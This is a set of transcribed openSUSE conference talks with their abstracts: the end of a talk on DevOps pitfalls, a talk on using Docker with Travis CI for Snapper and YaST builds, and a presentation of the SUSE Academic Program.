Don't encourage recklessness, but bring in new innovations and new ideas that might not be incorporated, that might not be espoused, that might not actually be brought into what's being developed or the process, but allow innovation to take place and reward measurable improvements. Say you've got a new bit of automation: recognize that. Inspire people through recognizing what it is that they're accomplishing while they're executing this complex process. The next step in the flow of the DevOps process that I want to highlight is post-release. Make sure, as you're having your DevOps team be successful, that you make time for a retrospective. That's really important, to reflect back upon what it is that you've done and how you got to where you are today. Don't stop with all of your automation at the end of the release. Make sure that you are automating stuff that happens post-release. The last thing I wanted to point out here is this concept of breathing. Allow the team to breathe. I'm going to poke fun at Scrum for a moment. This is my personal opinion and you will disagree. As far as Scrum is concerned, and this concept of sprints: this is exhausting. You're constantly sprinting. I don't like that. Your experience may be different, but as I try to encourage successful delivery of software, software solutions, with DevOps: yes, you want to be agile. Yes, you want to be adapting. Yes, you want to be fast. Yes, you want to get those new fixes and that new functionality out to your users efficiently and fast, but you've got to be able to have some time to step back and reflect and see the forest for the trees. The next thing I'll point out here is: don't lose sight of the maintaining item in the flow of the DevOps process. I add to that: sustaining. Be prepared, as part of your planning and as part of your whole process, to support and maintain the software after it is released, and not just say, oh, I've released it, it's gone, I've got nothing to do with it anymore. Make sure that you're continuing to automate, and make sure that you are continuing to monitor and measure what's going on with your software and the experiences that your customers and users are having. I mentioned golden hammers and silver bullets. I also mentioned Game of Thrones earlier, and I'm really not a big Game of Thrones guy, but I know a little bit about it. I just want to make sure that you realize, when you talk about a DevOps process, because I shared the silly representation of some hippies and stick it to the man, we hate process, we're going to go DevOps, we're going to be agile, man: that's kind of a bad, silly representation that makes fun of various aspects of it. But it's important to recognize that even though DevOps is intended to improve upon various ancient practices, it's still a process. As such, there are things that you need to do in that process. There are things that are important to accomplish in steps and with some clarity and with some formality. It may not be as rigid and formal as some of the other processes that you've been associated with, but it's still a process. It's not a golden hammer and it's not a silver bullet. It requires smart, caring, hardworking people and it requires management. It can't just happen organically. It has to have some kind of guidance and management and rules and process.
So the Game of Thrones representation, and I'll quickly segue then to my Oedipus example instead of Game of Thrones, but it's one of the most popular shows in television land. People don't even necessarily watch it on TV. Everybody watches Game of Thrones on their devices after each episode with Netflix. In Europe, is there a Netflix equivalent or is it Netflix? You just have to be in a specific region. I have no idea. So everybody watches Game of Thrones on Netflix. Thanks very much. So there's Peter Dinklage. Sometimes people say I look like him. I'm short and fat. I had a beard last time I gave this presentation. So I really don't look like him anyway. Okay, well, and you have some of the popular characters, some of the more interesting characters, and then you have Jamie Lannister and you have Jon Snow and you have Daenerys. You've got these guys that are famous for killing people. Jon Snow, at least this was at the end of season five. You had five kills for Jamie. You have four kills for Jon Snow and five kills for Daenerys. So G.R.R. Martin makes these characters out to be heroes, desirable people, appealing in a lot of different ways, smart, organized, deliberate, capable, powerful. And what I don't like about the way in which these powerful people are represented is that they obtain power and manifest their power by killing people. And that doesn't work for me. I don't think that people that kill other people are heroes, right? And I'm not trying to, my point is not really to assassinate the character of the series and of the particular author, but it's just an interesting thought to me as I consider what it is that he is trying to represent through this series, this very popular series about how to be successful. And then that led me to think about something I'm a little more familiar with, and that's the play by Sophocles, Greek playwright of Oedipus, great Greek tragedy where Oedipus ends up killing his father, and in the end, a lot of bad things happen by the time this Greek tragedy is finished. And it's the point I'm trying to make here without making you read Oedipus and not trying to make you become an expert in Greek tragedy. But the takeaway here from this Greek tragedy is Oedipus owes everything to his progenitors, to his parents, to his father. And he only realizes how much he owes to his dad after he's already killed his dad. And so that's the fun. Dear dad, I'm really, really, really, really, really sorry. Oedipus, right? Before we try to assassinate and kill and exert our powerful devops by killing our parent, the waterfall, start to value what it is that we're building upon and what it is from waterfall that really was powerful and really is meaningful in terms of what it is that we want to accomplish in an open source environment, in an environment that's growing, in an environment that's trying to provide greater, greater, and greater value to users in an open way, in a way that changes the way people think, in a way that changes the way people see the world around, in a way that creates new thought and inspires action. And of course, we can sit back and say, well, it's only software. But the ideas and values that are summed up in open source changes the world. And improving upon that and spreading that message becomes a very valuable thing. And it becomes a very desirable thing. 
The hallmarks of success in a successful open source project, in a successful process, in a successful delivery of a solution that changes the way people do things, that improves the value of what it is that we do on a day-to-day basis, that lifts and edifies and makes the world a better place: there are a few of these interesting hallmarks of success that are similar between both the dev and the ops. Use configuration management. We know that very well from a dev perspective in terms of using things like git, and how grateful we are for git once we get past how weird it is. And then all of the operations that take place with configuration management, that's Salt or Ansible or any of a dozen different other solutions. These are the same things that we can utilize together better in both the dev responsibilities and the operations responsibilities. We have to test. We need to be better about automating those tests. And we need to do it in much the same way between development and operations if we're going to have a successful DevOps approach to delivering software solutions. And make sure that you're doing it together, and you're not just saying: oh, I'm the developer, so I'm going to write unit tests, and you should have nothing to do with it, you QA and ops silly people, I don't have any reason for you to look at my unit tests. Don't do that. Share and collaborate on what it is that you're trying to test and how it is that you're testing, and you'll be more successful. More automation, continuous deployment: these are all good hallmarks of a successful DevOps organization. I'm going to share just two examples with you from SUSE. I have a good relationship with my friends in the SCC, the SUSE Customer Center, who successfully use DevOps and deliver a valuable product, a valuable solution that customers and users appreciate. In the Customer Center team, they made a team decision. This wasn't thrust upon them by some evil overlord or poorly intended manager. The team got together and said: if we're going to be successful, we need to be closer together in both the dev and the ops, and we're going to use a DevOps approach to do that, to overcome those barriers of collaboration and to improve the kinds of communication that we have. So they chose to use Scrum and the DevOps approach. They decided to minimize the specific roles of Joe, you're a developer, and Anne, you're an operator. It was Joe and Anne, we're doing DevOps together; we're going to have development responsibilities and operations responsibilities with no division between the roles. You might not choose to do that in your DevOps implementation, but that's the decision that the SCC team made and it has contributed to their success. One of the nice things about SCC is that it was basically a new project with new team members. It's perhaps harder to organize a DevOps process if you have a preexisting bit of software with preexisting teams that are already divided between development and operations. It's a little harder to just say, okay, we're going to stop doing what we've been doing for 10 years and we're going to change it all up. It's possible, but it's harder. In their case, it was easy to make this decision as a team because they said: we're new, we're not tied to anything old, we can make these kinds of decisions and we bring everybody together. They in this SCC team have fearless development. They're not afraid to make mistakes. They're not punished for making mistakes.
They certainly acknowledge when they make mistakes, but they try very hard to say, okay, we messed up. That was a good try. We tried to be innovative. It fell short. We're going to put that aside and move on. They have as many as 40 developments throughout the day. They're rapidly creating new software on a daily to hourly to minute basis and they're not afraid to throw it out there. They're not afraid to deploy. I think I said developments. I meant deployments. You knew what I said, what I meant when I said it, right? They have 40 deployments in a day. They can push it out and have no fear that something's going to be broken. Something might be broken, but they don't fear the fact that something might be wrong because they know that on that 39th time that they deployed something and something was wrong, they can in a matter of minutes turn around and deploy the 40th time and get it fixed and move on, move beyond the mistakes. They're confident in their ability to be agile. Lastly, they're automating everything. Now do they automate everything? No. They're always trying to improve the number of automations and to improve the number of automations, but it's something that they value and they're constantly automating as much as they can. A second example is the open build service. That's a great example here where this team uses a scrum approach. They involve agile development and in a similar way, the people that are the operators that are in operations are the same people that are the developers. Everybody can push a deployment at any time with appropriate collaboration and approvals, but those kinds of agile details within operations match what's going on in the development aspects of the software and that the team does it together with very little delineation between your developer and your operator. Because not necessarily with the same rapid deployment that the SCC team uses as I indicated in the previous slide, their deployment is a little more deliberate, but they still can deploy as quickly as they want to, as quickly as it makes sense. They do extensive stress testing before any deployment. Then again, lots and lots and lots and lots of automation. Moreover, they have a fairly comprehensive way of rolling back. Here as I wrap things up, this is my takeaway for this OpenSUSA conference. What's my point? I don't know. What did you take away from this is entirely up to you. You get to choose if there is any value to this, but this is what I had hoped to communicate to you as I talk about the good and the bad of DevOps. DevOps is surely just like any other process. It's not a golden hammer. It doesn't solve all your problems. You can't just go in and say, oh, we've had all these other things go wrong with our delivering the software solution, so we're just going to use DevOps because it'll fix everything. It won't. But it can help you to be more successful if, I'll get to that in the next point, make sure that as you're thinking about the value of DevOps or the value of any process that you're thinking about your people and how your people work, it's easy to say, I've got a team of 10 people and they're smart developers and smart operators. I can just throw DevOps at them and that's not true. It doesn't mean that you can have a screw and use a hammer to drive the screw. If you've got a nail, it's darn near impossible to drive a nail with a screwdriver. Make sure that you pick the kinds of processes and the kinds of details that match how your people work. 
Now, that doesn't mean that people can't change. Surely you can change. Surely you can encourage your team members to change and adapt and learn and grow. That's what we're here for. That's the whole reason that we're on this planet: to learn and to grow and become better. Your people can do the same thing. They can learn new processes. They can learn new tools. But don't force a process down the throat of this team of people just because you read that DevOps is the best thing and you believed the hype. The last point is most reliable results. Forget about what the process is, whether it's DevOps or anything else. The most reliable results that you will get will come via hardworking people, smart, dedicated people with high integrity, and the amount of trust and integrity that all of these different players have with each other and the quality of the communication that they have. So with that, I think that open source and openSUSE and Linux espouse these kinds of ideals, and that DevOps is a tool that can help make the software solutions better, but only because of the quality of you people and the amount of time and care that you put into what it is that is developed, whether it's software or anything else. Ask your questions. Anyone have any questions? You're all tired. You're worn out. You just want to get on. Where's the beer? I just wanted to say that I think you said one really important thing, which is breathe. And I feel like that's one of the things that everyone misses when talking about DevOps. It's kind of a panic all the time. We have to do so many things. We have to go faster and faster and faster. And my background is in games development before I started at SUSE. The only thing that matters there is performance. And the way you get performance is to slow down and look at what you're doing and identify things that you're doing that you shouldn't be doing and stop doing those things. So measure and optimize. And that's really the process you should be following. So when I see people talking about, for example, automation, and just talking about automating, we have to automate all the things all the time, just automate: the problem is you're going to end up automating a lot of things that you shouldn't even be doing in the first place. So I feel like that's one aspect of the discussion that no one really talks about when talking about DevOps and these kinds of things. That's an excellent comment. Thank you very much for that supporting comment. Great. Thank you for your time. Thanks for coming to openSUSE. What a great conference. And it's largely great because of the good people that put it together and you great people who come and support it and participate in these excellent, very well-intended and very world-changing projects. Thanks, everybody.
DevOps is one of the Industry's great buzz words. You've heard that DevOps (or ITOps, or WhateverOps) will solve all your development-to-deployment problems and how agile processes can increase the velocity of your projects. But you also likely know that it's not a silver bullet that solves all problems. This session will discuss how DevOps helps, what the pitfalls are, and how to avoid failure while squeezing the BEST out of DevOps.
10.5446/54484 (DOI)
My name is Ladislav Slezák. I'm a member of the YaST team in Prague. In this short talk, I will tell you about Docker at Travis and how we use it. The goal of this presentation is to show you that running continuous integration is not something difficult; you can use it even for small projects. I will show you some tricks we use in YaST. The first question is: why Travis? The obvious reason is because it's a hosted service. It's free for open source projects and is nicely integrated with GitHub. That means if your project is hosted at GitHub, you can quite easily run your tests at Travis. Just some examples. This is the YaST repository at GitHub. As you can see, the visible part is this green icon, which means the Travis build is passing. If you click that icon, you will see details. You can see the full log, that means what was executed on the runner, which tests were failing or not, and at the end you will see success. That's one point. The other point of GitHub integration is, for example, showing the status for each commit you have in your repository. If you look at the branches, you will see a sign for each branch. If it's a green checkmark, that build was okay and passed. If there's a red cross, that means that the build failed and there is some issue with it. And of course, the same marks are used in pull requests. Whenever somebody opens a pull request with some change, you can immediately see whether this change passes the continuous integration or not. We can see the status for every commit here. The first one was not so great, so it failed, but then it was fixed. Right now, we know that all checks have passed and we can merge the code into master, and we know that it won't break anything, it will still work, the package will still be building. So let's talk about some details of the Travis builds. Internally, the workers are running Ubuntu-based machines, either Precise or Trusty, but both of them are pretty old. Precise is actually discontinued and not supported anymore. So the question is: what if you need a newer compiler, newer libraries, and what if you need a completely different distribution because your software is not meant to run on Ubuntu? And another issue is that you can't easily debug the build, because, for example, if the build fails, what to do? You need to somehow check what was wrong, and it would be nice to either see it remotely, so you could for example SSH in, or reproduce the issue locally, but neither is possible with Travis. So why Docker? Docker is the obvious solution, which should help with the problems I just mentioned. It's supported out of the box at Travis, which means you don't need to install it, configure it or anything like that. It's just ready; you just issue the docker commands and it works. Another interesting and important feature is that it's container-based and really lightweight. That means there's no big overhead, because, as I said, the Travis machine already runs in a virtual machine, so having one more layer which would slow it down would not work nicely. So that's the advantage of Docker. Another advantage is that many base system images are available. So if you don't like Ubuntu, you can easily download Fedora, Debian, whatever. You can even easily build your own images at Docker Hub and use them for the build. That means you can enhance the base images and make the build much easier. I have prepared two examples. First is Snapper.
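For illustration, using Docker at Travis is basically a matter of declaring it as a service in the .travis.yml and then calling docker in the script section. This is only a minimal, generic sketch with made-up names, not one of the actual Snapper or YaST configuration files:

  sudo: required
  services:
    - docker
  script:
    - docker build -t myproject-image .      # build the image from the repo's Dockerfile
    - docker run --rm myproject-image        # run the tests configured as the entry point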
Snapper was already mentioned in several talks here. I will just say that it's a tool for managing file system snapshots, it's written in C++ and it's meant to be portable, so it should work in many distributions. The package we build in OBS is actually targeted also at Debian and Ubuntu and so on. So this is the main feature here. Regarding the source code, it's in a single git repository and the code is not changed very often. So this is the Snapper repository and again, we have this nice status badge. The setup is that every build runs in several Docker images, or virtual machines, but we run Docker, so in the end we can run each build in a different target system. We currently build for five different distributions. That means for every commit or pull request opened against Snapper, we build against Tumbleweed, Leap, Fedora, Ubuntu and Debian, and we know before merging the pull request that the package will still work for all these distributions. How is it done? We have separate Dockerfiles for each target distribution and a specific script for each. The Docker images are built at Travis in parallel: we define a build matrix, and this build matrix allows running each build in a separate virtual machine with a different Docker image. So we have the main Travis YAML file which defines the distributions, and different Dockerfiles for each build. You use these Dockerfiles, like this one for Tumbleweed: we basically base it on the publicly available Tumbleweed image and additionally run zypper and install the packages we need. Then the main work is done by this Travis script; again, for each target distribution we have a separate one. For example, for Tumbleweed we build the package, at the end we install it and even run snapper --version. That means we verify that the installed package still works. In this case the Docker images are built directly at Travis. That means it's easier for us to maintain, but it takes some more time. Because Snapper does not change very often, it doesn't matter. The second example is YaST, which is much more complicated because it's not portable, it's targeted just at openSUSE distributions and has a modular design. Currently we have over 100 git repositories, we have a bigger development team and there are more frequent changes. That means we need to cope with the fact that builds are started much more often, and we need to make sure that they are faster. To make it faster we pre-build Docker images at Docker Hub. We have a special image designed for Ruby and a second image designed for C++, because we mainly have two groups of YaST packages, either written in Ruby or written in C++, and to have a separate set of packages for each group we have a separate Docker image. This Docker image contains a common script which is used in all modules. That means at Travis we usually call just one single script which handles all modules. The script has to be a bit flexible: not all modules support RuboCop, so we need to check whether the module uses it, and whether the module uses Makefiles or the newer Rakefiles; some legacy modules are not converted to Rakefiles, so we have to be more flexible here. Then we run the tests and so on. So again: build the package and try installing it.
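A build matrix of the kind described for Snapper could be sketched roughly like this. The distribution names follow the talk, but the file names and commands are illustrative rather than the project's real configuration:

  sudo: required
  services:
    - docker
  env:                       # one Travis job per target distribution
    - DIST=tumbleweed
    - DIST=leap
    - DIST=fedora
    - DIST=ubuntu
    - DIST=debian
  script:
    - docker build -t snapper-$DIST -f Dockerfile.$DIST .    # per-distribution Dockerfile
    - docker run --rm snapper-$DIST ./travis-build-$DIST.sh  # build, install, run snapper --version

Each entry in env becomes a separate virtual machine at Travis, which is what makes the five distribution builds run in parallel.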
To ensure that the Docker image is always fresh, because we build against Factory, we need to ensure that the Factory changes are in the Docker image and that the Docker image contains the YaST packages. We have a simple Jenkins job which just triggers a rebuild of the image at Docker Hub. So every two hours or so we tell Docker Hub to rebuild the image, so we have fresh packages and we are sure that we are running against the latest versions. The original setup was that we built Ubuntu packages, but that didn't work well because it was extra work, it was hard to maintain and it was not very reliable, because the Ubuntu system has some different system defaults, or sometimes we forgot to add a new file to the Ubuntu packages. So either we got false positives or we missed some bugs, because, for example, we could not easily build RPM packages in Ubuntu, so we skipped that. So if there was a bug in the spec file, the old Ubuntu setup could not find it. With the new setup, as I said, we build two Docker images and the Travis script is shared, so it's much easier to maintain. We don't need to care about Ubuntu there, we just run the Tumbleweed Docker image and that's it. The summary is that now we have more reliable builds because we are really building in Tumbleweed, not in Ubuntu or something else. It's much easier to debug, because you can download the Docker image locally, run the same commands which are run in the Docker image at Travis, see what's happening there and quite easily find out what's wrong. Finally, we are not dependent on the default system at Travis, because, for example, Ubuntu 12.04 will be dropped soon and we have to do something about it, otherwise Travis will not work for us. We have to switch to something newer, and switching to a newer Ubuntu would not help much, so we decided to switch to Docker, which makes us independent of the Travis default. So, any questions? Yes? How long does it usually take when you submit a pull request for all the tests to finish? It depends on the package, but usually every package is built in, say, five minutes; it depends how many tests there are and how big the package is. If it's just a simple module which has just a few files, then it's a matter of minutes. Snapper, for example, that should go quickly, right? Yeah, that's like five minutes. Thanks. As you can see, it's usually about five minutes, but it depends on the worker. Here it's almost eight, but usually it's about five. And as I said, these builds are running in parallel, so the real time is much smaller than the sum of these times. Usually, when Travis is not loaded, all builds run in parallel, so in five minutes you'll get the results for five distributions. Okay, any more questions? I put some links in the slides, which I'll upload, or you can contact us at the YaST mailing list or the IRC channel at Freenode. Thank you. Thank you.
Do you work on an open source project? Is your source code hosted at GitHub? Do you use continuous integration or continuous deployment? Why NOT? This short talk will be about some tricks we use in the YaST team for continuous integration. Because we need a specific environment, we use Docker containers for building and testing at Travis. This approach also decreased our maintenance effort and made the builds more reliable. Hopefully this talk encourages you to use continuous integration for your projects as well.
10.5446/54486 (DOI)
Hello. Welcome everybody here at the gallery. I'm trying to get a nice atmosphere here. The temperature is quite okay, I guess, so I invited a few more people. My name is Emil Broek. I am working for SUSE and I'm going to tell you about the new SUSE Academic Program. If you have any questions during the talk, please jump in at any time. So what will I talk about in the next hour? I'll try to keep it under an hour. I'll first explain who I am and why I am standing here. Second, I will talk about why SUSE came up with an academic program. After that we'll walk through the new SUSE Academic Program: what does it mean, what does it contain, the different levels that are built into the new program. And at the end I've got a real call to action for all of you, so please stick around for that. And then Q&A at the end, but as I said, please interrupt at any time. So why me? I've been working for SUSE for two years now, and I am responsible and getting paid to... hello, somebody is waving. Do you want me to stay over there? Oh, okay. So... oh, I have to stay in this box. All right, I'll try. So professionally I'm working for SUSE and I'm responsible for the commercial training program. I'm managing all the training partners in Europe, the Middle East and Africa, and that is quite successful. At the time when I started with managing and setting up a program to get as many people as possible trained in SUSE, we realized that we were forgetting the students, but it was just a matter of: we can do only one thing at a time. So now, two years later, the whole program for commercial training institutes is working quite well in Europe, the Middle East and Africa, so now it is time to come up with an academic program coming from the corporate company SUSE. My background: as I said, I've been working for two years for SUSE, but before that I worked for ten years for a Linux consultancy and training company in the Netherlands, and I am one of the founders of LPI, together with other open source ambassadors in the Netherlands and Belgium. So I've been working on getting students to work with Linux for many years. And, as I said, then the chameleon came into my life, and I'm quite active on social media. So if you'd like to say something about this talk, then look at hashtag GEEKO on tour. I'm active on most platforms, so if you want to share anything, please do so; I'm looking forward to your feedback. So now to the academic program. I have been trying to get universities of applied sciences and different IT schools to work with Linux and open source in general for many years. And when I started, about 12 years ago now, I was pretty much shouting in the desert. It was just me, and when I was talking to many universities of applied sciences there was often not much response, because at that time the classes were just dominated by proprietary software solutions, and at that time there were some reasons why the focus was on proprietary solutions. But the world has changed. And when you're lobbying to get people, enthusiasts, IT instructors to be enthusiastic about training in Linux, training in open source, it is important that you are clear about what you focus on. Last year at this conference I did a talk with many recommendations on how you can get your school to work with Linux and open source, and one of the recommendations I had is: make sure that you are clear about what you're talking about.
In this case I try to be clear: the SUSE Academic Program that's been released fits very well into the curriculum, so into what the IT teachers are teaching, and also into operations. The desktop is not that dominant in the academic program. You can use it, but actually yesterday here I learned that there is a sort of openSUSE academic program being set up; that's at a very early stage, so I expect you will hear more about it in the next months, and probably next year here at the openSUSE Conference there will be a talk on the openSUSE academic program. For now we focus on operations and on curriculum. It's quite difficult for me to stay inside this box. Do I really have to stay? Can I not move? No. Oh, I'm told to stay here. So why is it important? Why is it important to have an academic program at all? It's important that the schools are bringing people to the labor market that actually fit the profile. If you look at open source technology: a couple of years ago we did an investigation, a survey, in the Netherlands, and we investigated the connection between the number of open source people finishing university and the demand in the labor market. And what we found there is what we've defined as the open generation gap. The open generation gap is the difference between what the labor market wants and the number of students finishing with knowledge of Linux technology, and when I say Linux I am talking about something wider than just Linux, because I think open source technology as a whole is important. So that's the open generation gap, and it was there in the Netherlands, and because I've been working for LPI, which is a global organization, I can say that it was a worldwide challenge at that time. Anybody in the room here today who is an IT teacher? Yes. Yes, one or a couple of IT teachers. All right. And obviously, because you're here, you're teaching Linux to students? Computer science. Okay. And Linux and open source methodologies, yes. All right. Excellent, excellent. And you've been doing that for many, many years? For three years. Three years, okay. And why is it only since three years that you're teaching Linux technology, and not before that? No one else was doing it before. But there was a demand? There is a misunderstood demand. The students don't know; they only know what their teachers tell them, and the existing faculty, like you said, there was a generation gap, they've grown up in a different, non-open-source environment, so they don't know how to teach it. And so there needs to be a bridge that comes across there, and I'm trying to help bridge that gap. Fantastic. Keep up the good work. And we might have something for you, for your students. So that's the academic program in total, and that's for Linux, independent of the distribution. So whatever distribution, as long as it's Linux, I'm fine with that. But as I'm working for SUSE, and I think openSUSE and SLES are fantastic distributions: if you have to teach students Linux, why not do it with SUSE technology? Does anybody have an argument for not doing it with SUSE technology? Well, if you had asked me three years ago, I would have said I don't really mind if it's SUSE or any of the other distributions. I think Debian, to be honest, is quite an important distribution as well. So yeah, I like SUSE a lot and I love the Geeko. I travel around with him everywhere, or her; it's actually not known if it's a him or a her.
But it is important that different distributions are being taught: as long as the market demands knowledge of several distributions, why not have the universities of applied sciences also teach the different technologies? Anybody disagree with me? Please do so. No? Okay, so we all like SUSE and we all understand that other distributions are important as well. Okay. Now, SUSE came up with an academic program. Anybody have an idea why SUSE is interested in coming up with an academic program? Potential employees? Yeah, absolutely. That's a very good reason, actually, because we've got more than 100 vacancies at the moment at SUSE. So if you're into SUSE technology and you'd like to work for us, have a look at the jobs we have. So absolutely, for our own reasons: to have more people knowing about SUSE, so they will more easily apply for a job with us. Absolutely. Another reason? Lower barriers to market. Can you explain a little bit? And who was saying that? Because I'm looking into a lamp. Oh, over there. Hey, Doug. Yeah, it basically gets people knowledgeable about open source at an early age, and of course as they go on and become managers or things of that nature, they're familiar with it. It's a knowledge aspect and it has a potential economic benefit for SUSE. Yeah, absolutely. So that's why SUSE came up with an academic program. And here we are. So what you see is the academic program. What does it focus on? It focuses on getting trained as an instructor and teaching SUSE technology, developing on SUSE, and using SUSE. Those three elements are what is now involved in the academic program of SUSE. When I say SUSE technology, I'm not just talking about SLES. As you probably have seen here at the conference and you already know, many people still see SUSE as just a Linux company, but the open source technologies we focus on are broader than just SLES. So the academic program also focuses on storage, cloud, SUSE Manager, and of course still SLES. And when you're going to train students and teachers (first the teachers and then the students, at least that's the way you should go) in SUSE technology, there is certification available as well. So it's not just the training and it's not just getting the students up to the right level of knowledge; there is even the possibility, if you are a university, to test this knowledge by using the same certification model that is being used in the commercial SUSE industry. So we've got a certification overview. At the bottom you've got the administrator level, on top of that the engineer level, and if you have gathered a whole bunch of the certifications below, you can become an architect in SUSE. It starts with certification, and for all four technologies I just mentioned you can get administrator-level certification and, on top of that, engineer-level certification. Any people here certified in any of the SUSE technologies? Somebody in the back there? Yes? Great. Only one person? That's something we have to work on, then. We have to get the people that are using SUSE technology certified in it as well, and that's actually one of the goals of the SUSE academic program: to get more people certified. So let's do a little bit of a recap. As I said, two years ago when I started with SUSE, there was no academic program.
So when people came to me and asked: can I use the training material that SUSE has developed for the commercial market, can I use it for my students? The answer was no. Unfortunately, it was not possible and not allowed. So we had to come up with an academic program. Before that, there were of course universities and different technical, non-profit educational institutions that we had as a customer base. We had different models for them, and we kept on supporting those models, but we didn't welcome any new universities anymore at that time. And now we have our academic program, which everybody can join. So if we look at the academic program of SUSE, as I said, it focuses on two elements: the element of operations, which is just the software that the school uses for its own infrastructure, and the curriculum. How is it built up? Here is the slide again. So it's about getting the instructors trained, getting the students trained. If you'd like to develop further on the technology, that's built into the model as well. And of course we'd like the software to be used by the students. So what does it look like? There are three layers. The first layer is completely free of cost. There is no fee, there is no minimum order, and there are not many demands other than that you have to be a university. So if you want to become part of the SUSE academic program, everybody can become a part of our program as long as you're a non-profit educational institute. Can you read this? Is this all... no, it's too small, right? So I'll do a little bit of cherry-picking here. If you sign up to this level of the program, you will get free access to all the training material we have available, and you will get a campus license to use SUSE. We will even make certification available, and that's being developed right now. For the commercial institutes, if somebody in the labor market wants to become certified, the cost of an exam to become SUSE certified is between 150 and 195 US dollars per exam. For the academic institutions we are developing, right now, a bulk model which will be a lot, a lot cheaper. We are really trying to lower the barrier to becoming certified. If you are a student and you like SUSE and you want to do the exam, it's very easy to become certified, and also very cheap. Free access to the SDK as well: the software development kit is part of this first layer too. I think those are the most important things in the first layer. Then there is a second layer, and that's when we talk about the software that the university is using itself. So if a university is already using SUSE, they can use it; if they want to use a lot of our technologies and products, compared to the commercial market there is a very, very low-entry and cheap model where you still get all the services and all the support that a commercial company gets as well. There is a third layer if you really want to go deep into the technology as a university. This is not about teaching; this is about using the software for your own environment, your own infrastructure. So that's the three-layer model that the SUSE academic program consists of. Is that clear? Any questions on the three-step model? Okay, then I'll move on. This is even more detail about the new academic program. In the description of this talk I promised to give detail about the academic program, so I will, but I will glance over it.
So if we look here at the first pillar, education: there is training material and certification available for all teachers, but compared to the commercial model you don't have to be certified as an instructor before you teach it. So we made it, again, as low-barrier as possible. It's not mandatory, but I do recommend that as an instructor you look at the certification and try the exams before you go and teach it; but it's not mandatory. It's all focused on getting as many people as possible trained in SUSE. There is specific material which is only to be used by non-profit and non-commercial institutions, and it will be clearly marked as material for this market, and of course it's not allowed to use the material outside these non-commercial institutes, because we've got a commercial training program. There, actually, the goal is not to make money for SUSE; we're not making money on the training material. What we do is try to get as many people as possible trained in the technology. So again, SUSE itself is not commercial about training, but we do have commercial training partners, not us ourselves, but training partners like here in Germany. One of the training partners that pops into my mind is B1; I've seen many people from B1 here as well. They are a training partner here in Germany, and that's a commercial training partner. Besides the training material on paper, there is also on-demand training material available for the academic institutions. So if you want to get your knowledge up to level, there are different possibilities to get there. The second pillar is a lot about using SUSE technology in your own infrastructure. The third is more about using the tools, the software development kit, and if you really want to go deep into the technology, you might be interested: if you're really teaching high-level technology to your students, then this pillar is interesting, because we deliver a lot of possibilities that are normally only offered to commercial institutions and are now also available for academic institutions. And then, as part of setting up the academic program, one of the first things: from the 25th till the 29th of September, in Prague, there will be SUSECON. I don't know if any of the openSUSE people know about that, but we've got a big conference coming up and it's great fun, I must say, fun and very informative, from technical talks to informative talks, with great examples of where the technology has been used with customers of SUSE. And I can say from my own experience, having visited two SUSECONs now, that it's really something great to go through. And if you're an instructor and you want to take students to Prague, it's a great possibility, and there is a high discount offered for universities and academic institutions that are part of the academic program. If you want to know the exact discount on the tickets and everything, please come to me afterwards and I'll explain how the model works. But the whole idea is to have a lot of university people and a lot of young people coming to SUSECON. So here's the promised call to action. It's quite easy, actually, the call to action, because it's just: go to the website www.suse.com. You subscribe there, and if you want to become part of the academic program and you're recognized as a non-commercial institute, so you fulfill the requirements, then literally immediately you are part of the program and you can benefit from the benefits.
Once you are allowed into the program, you will have access to a special portal. It's built by SUSE, and this portal will give you access to the on-demand training I talked about. It will give you access to all sorts of things: how you can get your knowledge up to speed, how the certification works, all the explanation about the further details of the program. Then, I've got a Raspberry Pi here; I actually took one with me. We've got ARM here and a Raspberry Pi. It's actually totally outside of the academic program of SUSE, but when I've been looking at the market for universities to be able to teach SUSE, I think the Raspberry Pi with SUSE is interesting, because it's now available without cost for a year to run SLES on the Raspberry Pi. Does anybody agree with me that it can be a great step forward to teach SUSE technologies using a Raspberry Pi? Wow, a lot of yes. Can you explain? Yeah. So I'll quickly repeat, otherwise they have to run up with the microphone. It's very easy; that's basically what you said. It was launched at SUSECON in Washington last year. The way it was explained there, and I liked it quite a lot, it was done by Aaron Quill, one of our high-level technology architects, who probably has a different job title, but he's quite a good guy. He had a picture of himself working on a machine in nineteen-something, long ago, and he was working on that machine at home when he was about 12 years old. When he was working on that machine and he came into the real world where information technology was being used, he found that what he had learned on that machine at home wasn't really useful to him. But if we are able to close the gap between the machine that you use at home and the machines that are being used in industry, up to the very biggest machines, the mainframes (because mainframes run on SUSE too), then you have the whole line of machines, from ARM machines and Raspberry Pis up to the mainframe, and everything in between runs on SUSE. So I thought that aspect is a really great reason why it's fantastic to now have SLES available on the Raspberry Pi. I was trying to switch slides, but it doesn't have the buttons, so let's do it like this. Yeah, well, here is SUSECON. As I said, SUSECON is in September and, well, not that far away from here. So you're all very welcome, and especially the people from the academic institutions that we have the special program for. So two calls to action, actually: I'd like to see you again at SUSECON 2017 in Prague, and you can go to the website www.suse.com/academic, subscribe there, and you're all welcome. Any questions at this point about the academic program? Would you like to use the microphone? Yes. Are you willing to share, next to the code base, also stuff like this with the openSUSE community? I'm sorry, I don't understand: what is SUSE not sharing with openSUSE? Is there something we are not sharing? You're talking about the material being, well, in fact closed to outsiders. Could openSUSE people have access to the material to use it for openSUSE trainings? Oh, the training material that's available. You're talking about the training material that we've developed at SUSE, which is being used to train both our customers and partners and now also students, and whether it's also available for people from the openSUSE community. That's your question. It's a good question. We have our material available through the training partners.
So if you are in contact with a training partner (as I said, in Germany we've got four partners, in the Netherlands one, and all over EMEA about 40 training partners), they are responsible for delivering the training, including the training material, to the market in those countries. So if you have specific questions, you can come to me and I can tell you who is delivering the training material in your country, and then it's up to the commercial training company and you to find a solution. And if you're working for a university, it's even easier, because then you have access to the material through the academic program. I hope that answers your question. Yes, it does. All right, great. Thank you very much. Great question, actually; I hadn't thought about that aspect of the training material being available. Any other questions? Yes: you have been talking about academic institutions and organizations in general, but very often you have mentioned universities. I have some contacts with a local university and also with some IT schools, so I would like to know if there is any difference in the program for a university versus something smaller, let's say. Yeah. Excellent question. There are quite clear guidelines set up, and actually it all comes down to: as long as it doesn't compete with my commercial training partners, then I'm fine. So if it's a very small academic institute and they have no commercial side business or anything, then absolutely, everybody is very welcome to join the academic program. In fact, once you subscribe, depending on where you are in the world, we will check every single person, every single subscription to the academic program, to see whether it's truly academic. But we even have, for example, the police school in the Netherlands, the military schools; those kinds of institutions also fulfill the requirements. So we are not strict, as long as it's not interfering with the commercial training business. Is that a clear answer to your question? Yes? Okay, thank you very much. I'd like to hear about the institutions you're talking about. Any other questions? Yeah. In the past there was a CompTIA... oh there, hey, in the back, hi. In the past there was a training certification cooperation including LPI, SUSE and 